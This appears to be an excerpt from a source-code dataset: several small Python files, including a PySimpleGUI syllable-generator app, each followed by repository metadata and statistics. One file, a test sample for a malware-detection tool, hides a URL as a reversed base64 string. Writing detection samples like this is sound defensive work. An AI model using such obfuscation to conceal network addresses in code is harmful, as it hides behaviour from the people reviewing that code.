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'
logo = [sg.Image(logo_image)]
question_row = [sg.Text("How many syllables do you want in your word? : ", font=("SegoeUI", 18))]
radio_buttons = [sg.Radio(text="1", group_id="-RADIO-", default=True, key="-RADIO1-", font=("SegoeUI", 16)),
sg.Radio(text="2", group_id="-RADIO-", key="-RADIO2-", font=("SegoeUI", 16)),
sg.Radio(text="3", group_id="-RADIO-", key="-RADIO3-", font=("SegoeUI", 16))]
generate_button = [sg.Button("GENERATE", font=("SegoeUI", 18), key="-GENERATE-", )]
result_text = [sg.Text(text="", key="-RESULT-", font=("SegoeUI", 18), size=(30, 5), justification="center",
background_color=sweet_light_red)]
# LAYOUT (column)
layout = [[sg.Column([logo, question_row, radio_buttons, generate_button, result_text],
element_justification="center", justification="center")]]
window = sg.Window("Random Syllables", layout, size=(650, 525), icon=icon)
| 955 | 30,122 | 0.951166 | 1,165 | 31,515 | 25.696137 | 0.884979 | 0.002205 | 0.002672 | 0.002305 | 0.005345 | 0.005345 | 0.002739 | 0.002739 | 0 | 0 | 0 | 0.155445 | 0.006092 | 31,515 | 32 | 30,123 | 984.84375 | 0.800275 | 0.001936 | 0 | 0 | 0 | 0.043478 | 0.966866 | 0.959711 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.043478 | 0 | 0.043478 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3e721c6e2c8468fc074c6847c2e35f36038b2831 | 27 | py | Python | tools/__init__.py | NotJoeMartinez/python3-groupme-tools | 19cb96f6bb00225dc2654b764b74f48cd9ba514a | [
"MIT"
] | 5 | 2021-03-20T01:38:58.000Z | 2022-03-16T11:43:36.000Z | tools/__init__.py | NotJoeMartinez/python3-groupme-tools | 19cb96f6bb00225dc2654b764b74f48cd9ba514a | [
"MIT"
] | 6 | 2021-02-22T08:46:34.000Z | 2022-03-11T20:08:37.000Z | tools/__init__.py | NotJoeMartinez/python3-groupme-tools | 19cb96f6bb00225dc2654b764b74f48cd9ba514a | [
"MIT"
] | null | null | null | from .avatar_fetch import * | 27 | 27 | 0.814815 | 4 | 27 | 5.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 27 | 1 | 27 | 27 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e4454e7377a8b6c91e4bc917a808a8b9a137be01 | 85 | py | Python | examples/base64-b64encode.py | lyvd/bandit4mal | b1ca9eb773ebed84d04cfeb589d028af532d1d11 | [
"Apache-2.0"
] | null | null | null | examples/base64-b64encode.py | lyvd/bandit4mal | b1ca9eb773ebed84d04cfeb589d028af532d1d11 | [
"Apache-2.0"
] | null | null | null | examples/base64-b64encode.py | lyvd/bandit4mal | b1ca9eb773ebed84d04cfeb589d028af532d1d11 | [
"Apache-2.0"
] | null | null | null | import base64
base64.b64encode("=82cus2Ylh2YvQ3clVXclJ3Lw9GdukHelR2LvoDc0RHa"[::-1])
| 28.333333 | 70 | 0.835294 | 6 | 85 | 11.833333 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.195122 | 0.035294 | 85 | 2 | 71 | 42.5 | 0.670732 | 0 | 0 | 0 | 0 | 0 | 0.517647 | 0.517647 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
e454fc3f15c21ee8fe43b74060a2b8b232b3de58 | 89 | py | Python | src/hub/dataload/sources/drugbank/__init__.py | ravila4/mychem.info | 9b63b5f0957b5e7b252ca8122734a363905036b3 | [
"Apache-2.0"
] | 10 | 2017-07-24T11:45:27.000Z | 2022-02-14T13:42:36.000Z | src/hub/dataload/sources/drugbank/__init__.py | veleritas/mychem.info | bb22357d4cbbc3c4865da224bf998f2cbc59f8f2 | [
"Apache-2.0"
] | 92 | 2017-06-22T16:49:20.000Z | 2022-03-24T20:50:01.000Z | src/hub/dataload/sources/drugbank/__init__.py | veleritas/mychem.info | bb22357d4cbbc3c4865da224bf998f2cbc59f8f2 | [
"Apache-2.0"
] | 11 | 2017-06-12T18:31:35.000Z | 2022-01-31T02:56:52.000Z | from .drugbank_upload import DrugBankUploader
from .drugbank_dump import DrugBankDumper
| 22.25 | 45 | 0.876404 | 10 | 89 | 7.6 | 0.7 | 0.315789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101124 | 89 | 3 | 46 | 29.666667 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e45b6a191a637d50928fd58e1a322150cae42d6a | 40 | py | Python | dqn_env/envs/__init__.py | sokolegg/dqn_env | 9d9a14828a38d205ffb992a918d51053a1e35b8b | [
"MIT"
] | null | null | null | dqn_env/envs/__init__.py | sokolegg/dqn_env | 9d9a14828a38d205ffb992a918d51053a1e35b8b | [
"MIT"
] | null | null | null | dqn_env/envs/__init__.py | sokolegg/dqn_env | 9d9a14828a38d205ffb992a918d51053a1e35b8b | [
"MIT"
] | null | null | null | from gym_foo.envs.dqn_env import DQNEnv
| 20 | 39 | 0.85 | 8 | 40 | 4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 40 | 1 | 40 | 40 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5f424f2b7a749f235960c9e6ff413a6494a9c8d9 | 96 | py | Python | venv/lib/python3.8/site-packages/pip/_vendor/tenacity/tornadoweb.py | Retraces/UkraineBot | 3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71 | [
"MIT"
] | 2 | 2022-03-13T01:58:52.000Z | 2022-03-31T06:07:54.000Z | venv/lib/python3.8/site-packages/pip/_vendor/tenacity/tornadoweb.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | 19 | 2021-11-20T04:09:18.000Z | 2022-03-23T15:05:55.000Z | venv/lib/python3.8/site-packages/pip/_vendor/tenacity/tornadoweb.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | null | null | null | /home/runner/.cache/pip/pool/ab/75/d9/5b603d464cb50615106cd1c5eb584cd445d0e7b740ef0c4f9e548ec77b | 96 | 96 | 0.895833 | 9 | 96 | 9.555556 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.40625 | 0 | 96 | 1 | 96 | 96 | 0.489583 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5f7bfbcac122f8b7fb403d05e8ff59f535d943fc | 23 | py | Python | modulos/__init__.py | andelpe/curso-intro-python | 6b3521aa887ae26e0f542f2dd105e9bb003db495 | [
"Apache-2.0"
] | 1 | 2020-06-08T10:27:24.000Z | 2020-06-08T10:27:24.000Z | modulos/__init__.py | andelpe/curso-intro-python | 6b3521aa887ae26e0f542f2dd105e9bb003db495 | [
"Apache-2.0"
] | null | null | null | modulos/__init__.py | andelpe/curso-intro-python | 6b3521aa887ae26e0f542f2dd105e9bb003db495 | [
"Apache-2.0"
] | 1 | 2020-06-08T09:49:24.000Z | 2020-06-08T09:49:24.000Z | from .subpack import *
| 11.5 | 22 | 0.73913 | 3 | 23 | 5.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 23 | 1 | 23 | 23 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5fa3437c41aee2ccd60dceefa0a281b32fd7a9ac | 154 | py | Python | hardwork/hardway/34_accessing.py | jskyzero/Python.Playground | 6a6d815d2307d17657b7622201874e4ee7f2324a | [
"MIT"
] | null | null | null | hardwork/hardway/34_accessing.py | jskyzero/Python.Playground | 6a6d815d2307d17657b7622201874e4ee7f2324a | [
"MIT"
] | null | null | null | hardwork/hardway/34_accessing.py | jskyzero/Python.Playground | 6a6d815d2307d17657b7622201874e4ee7f2324a | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
animals = ["1", "2", "3", "4","5"]
print animals
print "animals[0] is %s" % animals[0]
print "animals[-1] is %s" % animals[-1]
| 17.111111 | 39 | 0.532468 | 25 | 154 | 3.28 | 0.52 | 0.292683 | 0.243902 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.079365 | 0.181818 | 154 | 8 | 40 | 19.25 | 0.571429 | 0.136364 | 0 | 0 | 0 | 0 | 0.290076 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.75 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
39555fea2b53e169fe97b664f2e3b9d379207489 | 43 | py | Python | handwritten_num_classifier/__init__.py | meow-noisy/handwritten_num_classifier | 779f02bc1e082b33fec6e1b6a814ff99498429ac | [
"MIT"
] | null | null | null | handwritten_num_classifier/__init__.py | meow-noisy/handwritten_num_classifier | 779f02bc1e082b33fec6e1b6a814ff99498429ac | [
"MIT"
] | null | null | null | handwritten_num_classifier/__init__.py | meow-noisy/handwritten_num_classifier | 779f02bc1e082b33fec6e1b6a814ff99498429ac | [
"MIT"
] | null | null | null | from .api import load_model, download_model | 43 | 43 | 0.860465 | 7 | 43 | 5 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093023 | 43 | 1 | 43 | 43 | 0.897436 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3971c13d33901f93e735b565a4f6f04e1e902c17 | 26 | py | Python | leopy/workpy/__init__.py | pobingxiaoxiao/leopy | c6fc291cfcd5a8fa58614873edac9b09f20f2e0a | [
"MIT"
] | null | null | null | leopy/workpy/__init__.py | pobingxiaoxiao/leopy | c6fc291cfcd5a8fa58614873edac9b09f20f2e0a | [
"MIT"
] | null | null | null | leopy/workpy/__init__.py | pobingxiaoxiao/leopy | c6fc291cfcd5a8fa58614873edac9b09f20f2e0a | [
"MIT"
] | 1 | 2019-06-10T02:09:46.000Z | 2019-06-10T02:09:46.000Z | from .work import open_app | 26 | 26 | 0.846154 | 5 | 26 | 4.2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.115385 | 26 | 1 | 26 | 26 | 0.913043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
39a551a4935b82ee353f9b437e601378cbb1938a | 153 | py | Python | accounts/admin.py | tochikaze3/Wildcart | 7c0f7176ea1a79bdd7662845e8722c2dc7d3b502 | [
"MIT"
] | null | null | null | accounts/admin.py | tochikaze3/Wildcart | 7c0f7176ea1a79bdd7662845e8722c2dc7d3b502 | [
"MIT"
] | null | null | null | accounts/admin.py | tochikaze3/Wildcart | 7c0f7176ea1a79bdd7662845e8722c2dc7d3b502 | [
